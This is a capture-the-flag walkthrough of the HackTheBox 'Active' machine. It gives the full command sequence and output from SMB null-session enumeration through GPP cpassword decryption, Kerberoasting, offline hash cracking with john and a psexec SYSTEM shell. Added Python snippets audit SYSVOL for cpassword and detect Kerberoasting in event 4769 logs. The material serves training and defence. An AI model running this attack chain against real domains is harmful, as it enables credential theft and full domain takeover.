Enumeration
The reconnaissance phase began with a full port scan, which revealed a Windows Server 2008 R2 Domain Controller. The critical services identified were:
- 53/tcp: DNS
- 88/tcp: Kerberos
- 135/tcp: Microsoft RPC
- 139/tcp: NetBIOS
- 389/tcp: LDAP
- 445/tcp: SMB
Browsing the SMB shares through a null session, we found read access to the Replication share. Inside it, we walked the Group Policy folder structure until we reached the file Groups.xml. This file contained the username SVC_TGS and a password in the cpassword attribute, an AES-encrypted value whose decryption key Microsoft made public years ago, which let us recover the password in cleartext.
# Add active.htb to the known hosts
┌──(jquirozz㉿jquirozz.com)-[~/HTB/active]
└─$ echo "10.129.24.182 active.htb" | sudo tee -a /etc/hosts
# Check connectivity; ttl=127 tells us it is a Windows machine
┌──(jquirozz㉿jquirozz.com)-[~/HTB/active]
└─$ ping -c 1 active.htb
PING active.htb (10.129.24.182) 56(84) bytes of data.
64 bytes from active.htb (10.129.24.182): icmp_seq=1 ttl=127 time=103 ms
# [-p-] Scan all ports (65535)
# [--open] Show only ports in the open state
# [-sS] Stealth SYN scan, which avoids completing the TCP handshake
# [-Pn] Do not perform host discovery via ping
# [-n] Disable DNS resolution to speed up the scan
# [--min-rate=5000] Send packets at a minimum rate of 5000 per second
┌──(jquirozz㉿jquirozz.com)-[~/HTB/active]
└─$ sudo nmap -p- --open -sS -Pn -n --min-rate=5000 10.129.24.182 -oG allPorts
# Helper script that extracts the open ports from the allPorts file and copies them
┌──(jquirozz㉿jquirozz.com)-[~/HTB/active]
└─$ extractPorts allPorts
[*] IP Address: 10.129.24.182
[*] Open ports: 53,88,135,139,389,445,464,593,636,3268,3269,5722,9389,47001,49152,49153,49154,49155,49157,49158,49165,49166,49168
[!] Ports copied to clipboard
# [-sCV] Combination of -sC (default scripts) and -sV (version detection)
┌──(jquirozz㉿jquirozz.com)-[~/HTB/active]
└─$ sudo nmap -sCV -p53,88,135,139,389,445,464,593,636,3268,3269,5722,9389,47001,49152,49153,49154,49155,49157,49158,49165,49166,49168 --min-rate=5000 10.129.24.182 -oN targeted
PORT STATE SERVICE VERSION
53/tcp open domain Microsoft DNS 6.1.7601 (1DB15D39) (Windows Server 2008 R2 SP1)
| dns-nsid:
|_ bind.version: Microsoft DNS 6.1.7601 (1DB15D39)
88/tcp open kerberos-sec Microsoft Windows Kerberos (server time: 2026-01-07 10:30:32Z)
135/tcp open msrpc Microsoft Windows RPC
139/tcp open netbios-ssn Microsoft Windows netbios-ssn
389/tcp open ldap Microsoft Windows Active Directory LDAP (Domain: active.htb, Site: Default-First-Site-Name)
445/tcp open microsoft-ds?
...
...
...
49165/tcp open msrpc Microsoft Windows RPC
49166/tcp open msrpc Microsoft Windows RPC
49168/tcp open msrpc Microsoft Windows RPC
Service Info: Host: DC; OS: Windows; CPE: cpe:/o:microsoft:windows_server_2008:r2:sp1, cpe:/o:microsoft:windows
Host script results:
| smb2-time:
| date: 2026-01-07T10:31:33
|_ start_date: 2026-01-07T09:21:17
|_clock-skew: 6s
| smb2-security-mode:
| 2:1:0:
|_ Message signing enabled and required
# Check the SMB service and the domain name with crackmapexec
┌──(jquirozz㉿jquirozz.com)-[~/HTB/active]
└─$ crackmapexec smb 10.129.24.182
SMB 10.129.24.182 445 DC [*] Windows 7 / Server 2008 R2 Build 7601 x64 (name:DC) (domain:active.htb) (signing:True) (SMBv1:False)
# [-L] List the shares available on the host
# [-N] Use a null session (no username or password)
┌──(jquirozz㉿jquirozz.com)-[~/HTB/active]
└─$ smbclient -L active.htb -N
Anonymous login successful
Sharename Type Comment
--------- ---- -------
ADMIN$ Disk Remote Admin
C$ Disk Default share
IPC$ IPC Remote IPC
NETLOGON Disk Logon server share
Replication Disk
SYSVOL Disk Logon server share
Users Disk
# [-H] Specify the target host
# [-r] Recursively list the contents of the share
┌──(jquirozz㉿jquirozz.com)-[~/HTB/active]
└─$ smbmap -H active.htb -r Replication/active.htb/policies/{31B2F340-016D-11D2-945F-00C04FB984F9}/MACHINE/Preferences/Groups
[+] IP: 10.129.24.182:445 Name: active.htb Status: Authenticated
Disk Permissions Comment
---- ----------- -------
ADMIN$ NO ACCESS Remote Admin
C$ NO ACCESS Default share
IPC$ NO ACCESS Remote IPC
NETLOGON NO ACCESS Logon server share
Replication READ ONLY
./Replicationactive.htb/policies/{31B2F340-016D-11D2-945F-00C04FB984F9}/MACHINE/Preferences/Groups
dr--r--r-- 0 Sat Jul 21 06:37:44 2018 .
dr--r--r-- 0 Sat Jul 21 06:37:44 2018 ..
fr--r--r-- 533 Sat Jul 21 06:38:11 2018 Groups.xml
SYSVOL NO ACCESS Logon server share
Users NO ACCESS
# [--download] Download a specific file from the SMB server to the local machine
┌──(jquirozz㉿jquirozz.com)-[~/HTB/active]
└─$ smbmap -H active.htb --download Replication/active.htb/policies/{31B2F340-016D-11D2-945F-00C04FB984F9}/MACHINE/Preferences/Groups/Groups.xml
[+] Starting download: Replication\active.htb\policies\{31B2F340-016D-11D2-945F-00C04FB984F9}\MACHINE\Preferences\Groups\Groups.xml (533 bytes)
[+] File output to: /home/jquirozz/HTB/active/10.129.24.182-Replication_active.htb_policies_{31B2F340-016D-11D2-945F-00C04FB984F9}_MACHINE_Preferences_Groups_Groups.xml
┌──(jquirozz㉿jquirozz.com)-[~/HTB/active]
└─$ cat 10.129.24.182-Replication_active.htb_policies_\{31B2F340-016D-11D2-945F-00C04FB984F9\}_MACHINE_Preferences_Groups_Groups.xml
# <?xml version="1.0" encoding="utf-8"?>
# <Groups clsid="{3125E937-EB16-4b4c-9934-544FC6D24D26}"><User clsid="{DF5F1855-51E5-4d24-8B1A-D9BDE98BA1D1}"
# name="active.htb\SVC_TGS" image="2" changed="2018-07-18 20:46:06" uid="{EF57DA28-5F69-4530-A59E-AAB58578219D}"><Properties action="U" newName=""
# fullName="" description="" cpassword="edBSHOwhZLTjt/QS9FeIcJ83mjWA98gw9guKOhJOdcqh+ZGMeXOsQbCpZ3xUjTLfCuNH8pG5aSVYdYw/NglVmQ"
# changeLogon="0" noChange="1" neverExpires="1" acctDisabled="0" userName="active.htb\SVC_TGS"/></User>3 </Groups>
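A defender's counterpart to the step above, added here as an example and not code from the original write-up: a small Python auditor that walks a copy of SYSVOL (or the Replication share) and reports every GPP XML element that still carries a cpassword attribute, which is the artefact an attacker looks for. The set of file names, the account-attribute names and the inline sample (the Groups.xml shown above, constructed for the example) are assumptions of this example.

```python
#!/usr/bin/env python3
"""Audit Group Policy Preferences XML files for cpassword attributes.

Any cpassword in SYSVOL is a finding: the AES key that protects it is public,
so the value is as good as a cleartext password for anyone who can read the share."""
import os
import xml.etree.ElementTree as ET

GPP_FILES = {"groups.xml", "scheduledtasks.xml", "services.xml",
             "datasources.xml", "drives.xml", "printers.xml"}
# Attribute names the various GPP XML files use for the account the password belongs to.
ACCOUNT_ATTRS = ("userName", "accountName", "runAs", "username")

# Constructed sample: the Groups.xml recovered from the Replication share above
# (raw string, so the backslash in the account name is kept literally).
SAMPLE_GROUPS_XML = r'''<?xml version="1.0" encoding="utf-8"?>
<Groups clsid="{3125E937-EB16-4b4c-9934-544FC6D24D26}"><User clsid="{DF5F1855-51E5-4d24-8B1A-D9BDE98BA1D1}"
name="active.htb\SVC_TGS" image="2" changed="2018-07-18 20:46:06" uid="{EF57DA28-5F69-4530-A59E-AAB58578219D}"><Properties action="U" newName=""
fullName="" description="" cpassword="edBSHOwhZLTjt/QS9FeIcJ83mjWA98gw9guKOhJOdcqh+ZGMeXOsQbCpZ3xUjTLfCuNH8pG5aSVYdYw/NglVmQ"
changeLogon="0" noChange="1" neverExpires="1" acctDisabled="0" userName="active.htb\SVC_TGS"/></User></Groups>'''

def find_cpasswords(data, source):
    """Return one finding per element carrying a cpassword attribute in one XML document."""
    try:
        root = ET.fromstring(data)
    except ET.ParseError as exc:
        # An unparsable preference file still deserves a look, so report it rather than skip it.
        return [{"file": source, "element": None, "account": None, "error": str(exc)}]
    findings = []
    for elem in root.iter():
        cpw = elem.get("cpassword")
        if cpw is None:
            continue
        account = next((elem.get(a) for a in ACCOUNT_ATTRS if elem.get(a)), None)
        findings.append({"file": source, "element": elem.tag, "account": account,
                         "empty": cpw == "", "cpassword": cpw})
    return findings

def scan_sysvol(root_dir):
    """Walk a copy of SYSVOL (or the Replication share) and audit every GPP XML file."""
    findings = []
    for dirpath, _, files in os.walk(root_dir):
        for fname in files:
            if fname.lower() in GPP_FILES:
                path = os.path.join(dirpath, fname)
                with open(path, "rb") as fh:
                    findings.extend(find_cpasswords(fh.read(), path))
    return findings
```

Running `scan_sysvol("/path/to/sysvol-copy")` over a mounted or downloaded share prints one record per leftover cpassword; an empty cpassword is reported too but marked as harmless.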
Exploitation
With the credentials of the service account active.htb\SVC_TGS, we validated access to the other shares and obtained the user flag from its desktop. To dig deeper into the domain, we used rpcclient to list users and groups, confirming that the Administrator account belonged to the Domain Admins group.
# Tool shipped with Kali for decrypting Group Policy Preferences (GPP) passwords
┌──(jquirozz㉿jquirozz.com)-[~/HTB/active]
└─$ gpp-decrypt "edBSHOwhZLTjt/QS9FeIcJ83mjWA98gw9guKOhJOdcqh+ZGMeXOsQbCpZ3xUjTLfCuNH8pG5aSVYdYw/NglVmQ"
GPPstillStandingStrong2k18
# [-u] Username to authenticate as
# [-p] The user's password
# [-r] Recursively list the shares using valid credentials
┌──(jquirozz㉿jquirozz.com)-[~/HTB/active]
└─$ smbmap -H active.htb -u "SVC_TGS" -p "GPPstillStandingStrong2k18" -r
[+] IP: 10.129.24.182:445 Name: active.htb Status: Authenticated
Disk Permissions Comment
---- ----------- -------
ADMIN$ NO ACCESS Remote Admin
C$ NO ACCESS Default share
IPC$ NO ACCESS Remote IPC
...
...
...
Users READ ONLY
./Users
dw--w--w-- 0 Sat Jul 21 10:39:20 2018 .
dw--w--w-- 0 Sat Jul 21 10:39:20 2018 ..
dr--r--r-- 0 Mon Jul 16 06:14:21 2018 Administrator
fr--r--r-- 174 Mon Jul 16 17:01:17 2018 desktop.ini
dw--w--w-- 0 Mon Jul 16 17:08:47 2018 Public
dr--r--r-- 0 Sat Jul 21 11:16:32 2018 SVC_TGS
┌──(jquirozz㉿jquirozz.com)-[~/HTB/active]
└─$ smbmap -H active.htb -u "SVC_TGS" -p "GPPstillStandingStrong2k18" --download Users/SVC_TGS/Desktop/user.txt
[+] Starting download: Users\SVC_TGS\Desktop\user.txt (34 bytes)
[+] File output to: /home/jquirozz/HTB/active/10.129.24.182-Users_SVC_TGS_Desktop_user.txt
┌──(jquirozz㉿jquirozz.com)-[~/HTB/active]
└─$ cat 10.129.24.182-Users_SVC_TGS_Desktop_user.txt
d5****************************77
# [-U] Username and password separated by % for rpcclient
# [-c] Run a specific rpcclient command (enumdomusers = list domain users)
┌──(jquirozz㉿jquirozz.com)-[~/HTB/active]
└─$ rpcclient -U "SVC_TGS%GPPstillStandingStrong2k18" 10.129.24.182 -c "enumdomusers"
user:[Administrator] rid:[0x1f4]
user:[Guest] rid:[0x1f5]
user:[krbtgt] rid:[0x1f6]
user:[SVC_TGS] rid:[0x44f]
# [-c] Run a specific command (querydispinfo = get display information about the users)
┌──(jquirozz㉿jquirozz.com)-[~/HTB/active]
└─$ rpcclient -U "SVC_TGS%GPPstillStandingStrong2k18" 10.129.24.182 -c "querydispinfo"
index: 0xdea RID: 0x1f4 acb: 0x00000210 Account: Administrator Name: (null) Desc: Built-in account for administering the computer/domain
index: 0xdeb RID: 0x1f5 acb: 0x00000215 Account: Guest Name: (null) Desc: Built-in account for guest access to the computer/domain
index: 0xe19 RID: 0x1f6 acb: 0x00020011 Account: krbtgt Name: (null) Desc: Key Distribution Center Service Account
index: 0xeb2 RID: 0x44f acb: 0x00000210 Account: SVC_TGS Name: SVC_TGS Desc: (null)
# [-c] Run a specific command (enumdomgroups = list domain groups)
┌──(jquirozz㉿jquirozz.com)-[~/HTB/active]
└─$ rpcclient -U "SVC_TGS%GPPstillStandingStrong2k18" 10.129.24.182 -c "enumdomgroups"
group:[Enterprise Read-only Domain Controllers] rid:[0x1f2]
group:[Domain Admins] rid:[0x200]
group:[Domain Users] rid:[0x201]
...
...
...
group:[Group Policy Creator Owners] rid:[0x208]
group:[Read-only Domain Controllers] rid:[0x209]
group:[DnsUpdateProxy] rid:[0x44e]
# [-c] Run a specific command (querygroupmem = list the members of a group by its RID)
┌──(jquirozz㉿jquirozz.com)-[~/HTB/active]
└─$ rpcclient -U "SVC_TGS%GPPstillStandingStrong2k18" 10.129.24.182 -c "querygroupmem 0x200"
rid:[0x1f4] attr:[0x7]
# [-c] Run a specific command (queryuser = get information about a user by its RID)
┌──(jquirozz㉿jquirozz.com)-[~/HTB/active]
└─$ rpcclient -U "SVC_TGS%GPPstillStandingStrong2k18" 10.129.24.182 -c "queryuser 0x1f4"
User Name : Administrator
Full Name :
Home Drive :
Dir Drive :
Profile Path:
Logon Script:
Description : Built-in account for administering the computer/domain
Workstations:
Comment :
Remote Dial :
Logon Time : Wed, 07 Jan 2026 04:22:39 EST
Logoff Time : Wed, 31 Dec 1969 19:00:00 EST
Kickoff Time : Wed, 31 Dec 1969 19:00:00 EST
Password last set Time : Wed, 18 Jul 2018 15:06:40 EDT
Password can change Time : Thu, 19 Jul 2018 15:06:40 EDT
Password must change Time: Wed, 13 Sep 30828 22:48:05 EDT
unknown_2[0..31]...
user_rid : 0x1f4
group_rid: 0x201
acb_info : 0x00000210
fields_present: 0x00ffffff
logon_divs: 168
bad_password_count: 0x00000000
logon_count: 0x0000006e
padding1[0..7]...
logon_hrs[0..21]...
Privilege Escalation
Escalation to Domain Admin was carried out with the Kerberoasting technique. Since the Administrator account had a Service Principal Name (SPN) associated with it, we could request a service ticket (TGS) encrypted with the hash of its password.
We extracted the ticket with Impacket's GetUserSPNs.py and ran an offline brute-force attack on it with john (John the Ripper). With the administrator's password in hand, we used psexec.py to obtain a shell with SYSTEM privileges, completing the full compromise of the domain.
# [active.htb/SVC_TGS] Domain and user to query
# [-no-pass] Try to obtain a TGT without supplying a password (AS-REP Roasting)
┌──(jquirozz㉿jquirozz.com)-[~/HTB/active]
└─$ python3 GetNPUsers.py active.htb/SVC_TGS -no-pass
Impacket v0.13.0.dev0 - Copyright Fortra, LLC and its affiliated companies
[*] Getting TGT for SVC_TGS
# [active.htb/SVC_TGS:GPP...] Credentials of the user requesting the service tickets
# This command lists the domain accounts that have SPNs associated and are therefore Kerberoastable
┌──(jquirozz㉿jquirozz.com)-[~/HTB/active]
└─$ python3 GetUserSPNs.py active.htb/SVC_TGS:GPPstillStandingStrong2k18
ServicePrincipalName Name MemberOf PasswordLastSet LastLogon Delegation
-------------------- ------------- -------------------------------------------------------- -------------------------- -------------------------- ----------
active/CIFS:445 Administrator CN=Group Policy Creator Owners,CN=Users,DC=active,DC=htb 2018-07-18 15:06:40.351723 2026-01-07 04:22:39.194598
# [-request] Request the TGS ticket from the KDC for later offline cracking
┌──(jquirozz㉿jquirozz.com)-[~/HTB/active]
└─$ python3 GetUserSPNs.py active.htb/SVC_TGS:GPPstillStandingStrong2k18 -request
$krb5tgs$23$*Administrator$ACTIVE.HTB$active.htb/Administrator*$cf9eecdb7bae2a80647a1954de57145e$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
# Save the ticket to a text file, using single quotes so the shell does not interpret the $ characters
┌──(jquirozz㉿jquirozz.com)-[~/HTB/active]
└─$ echo '$krb5tgs$23$*Administrator$ACTIVE.HTB$active.htb/Administrator*$cf9eecdb7bae2a80647a1954de57145e$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' > hash.txt
# [--format=krb5tgs] Hash format for a Kerberos 5 TGS ticket
# [-w] Path to the password wordlist
┌──(jquirozz㉿jquirozz.com)-[~/HTB/active]
└─$ sudo john --format=krb5tgs hash.txt -w=rockyou.txt
Using default input encoding: UTF-8
Loaded 1 password hash (krb5tgs, Kerberos 5 TGS etype 23 [MD4 HMAC-MD5 RC4])
Will run 4 OpenMP threads
Press 'q' or Ctrl-C to abort, almost any other key for status
Ticketmaster1968 (?)
1g 0:00:00:04 DONE (2026-01-07 09:46) 0.2352g/s 2479Kp/s 2479Kc/s 2479KC/s Tiffani143..Thrall
Use the "--show" option to display all of the cracked passwords reliably
Session completed.
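From the detection side, as an added example that is not part of the original write-up: the TGS request made by GetUserSPNs.py -request is logged on the DC as Security Event ID 4769 with TicketEncryptionType 0x17, which is the etype 23 / RC4 that john reports above. The Python below flags such requests for user accounts (computer accounts and krbtgt excluded) in a set of constructed 4769 records; the field names follow the 4769 event schema, and the requester IP is a placeholder, not a value from the page.

```python
#!/usr/bin/env python3
"""Flag likely Kerberoasting in Windows Security Event ID 4769 records.

A Kerberoast shows up as a successful TGS request (4769) for a user account that
holds an SPN, encrypted with RC4 (TicketEncryptionType 0x17, etype 23) so the
ticket can be cracked offline. Computer accounts ($) and krbtgt are excluded and
AES-only service tickets (0x11/0x12) are ignored.
"""
from collections import defaultdict

RC4_ETYPE = "0x17"

# Constructed sample events modelled on what the DC would log for the
# GetUserSPNs.py -request step above; the requester IP is a placeholder.
SAMPLE_4769 = [
    {"TargetUserName": "SVC_TGS@ACTIVE.HTB", "ServiceName": "DC$",
     "TicketEncryptionType": "0x12", "IpAddress": "::ffff:192.0.2.10", "Status": "0x0"},
    {"TargetUserName": "SVC_TGS@ACTIVE.HTB", "ServiceName": "krbtgt",
     "TicketEncryptionType": "0x17", "IpAddress": "::ffff:192.0.2.10", "Status": "0x0"},
    {"TargetUserName": "SVC_TGS@ACTIVE.HTB", "ServiceName": "Administrator",
     "TicketEncryptionType": "0x17", "IpAddress": "::ffff:192.0.2.10", "Status": "0x0"},
    {"TargetUserName": "SVC_TGS@ACTIVE.HTB", "ServiceName": "Administrator",
     "TicketEncryptionType": "0x17", "IpAddress": "::ffff:192.0.2.10", "Status": "0x1b"},
]

def is_roast_candidate(ev):
    """True for a successful RC4 service-ticket request for a user (non-machine) account."""
    svc = ev.get("ServiceName", "")
    return (ev.get("TicketEncryptionType", "").lower() == RC4_ETYPE
            and ev.get("Status") == "0x0"
            and not svc.endswith("$")
            and svc.lower() != "krbtgt")

def flag_kerberoast(events):
    """Return the suspicious events and a per-requester list of targeted service accounts."""
    hits = [ev for ev in events if is_roast_candidate(ev)]
    by_requester = defaultdict(set)
    for ev in hits:
        by_requester[(ev["TargetUserName"], ev["IpAddress"])].add(ev["ServiceName"])
    summary = {key: sorted(names) for key, names in by_requester.items()}
    return hits, summary

if __name__ == "__main__":
    _, summary = flag_kerberoast(SAMPLE_4769)
    for (user, ip), services in summary.items():
        print(f"[!] {user} from {ip} requested RC4 service tickets for: {', '.join(services)}")
```

In a real environment the same logic is fed from the exported 4769 events; a single requester collecting RC4 tickets for several service accounts in a short window is the stronger signal.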
# Final validation of the Administrator credentials with crackmapexec
┌──(jquirozz㉿jquirozz.com)-[~/HTB/active]
└─$ crackmapexec smb 10.129.24.182 -u "Administrator" -p "Ticketmaster1968"
SMB 10.129.24.182 445 DC [*] Windows 7 / Server 2008 R2 Build 7601 x64 (name:DC) (domain:active.htb) (signing:True) (SMBv1:False)
SMB 10.129.24.182 445 DC [+] active.htb\Administrator:Ticketmaster1968 (Pwn3d!)
# Remote command execution to obtain an interactive shell
# Format: domain/user:password@IP program_to_run
┌──(jquirozz㉿jquirozz.com)-[~/HTB/active]
└─$ python3 psexec.py active.htb/Administrator:Ticketmaster1968@10.129.24.182 cmd.exe
Impacket v0.13.0.dev0 - Copyright Fortra, LLC and its affiliated companies
[*] Requesting shares on 10.129.24.182.....
[*] Found writable share ADMIN$
[*] Uploading file TDZGdrFk.exe
[*] Opening SVCManager on 10.129.24.182.....
[*] Creating service txmt on 10.129.24.182.....
[*] Starting service txmt.....
[!] Press help for extra shell commands
Microsoft Windows [Version 6.1.7601]
Copyright (c) 2009 Microsoft Corporation. All rights reserved.
C:\Windows\system32> type C:\Users\Administrator\Desktop\root.txt
b9****************************5e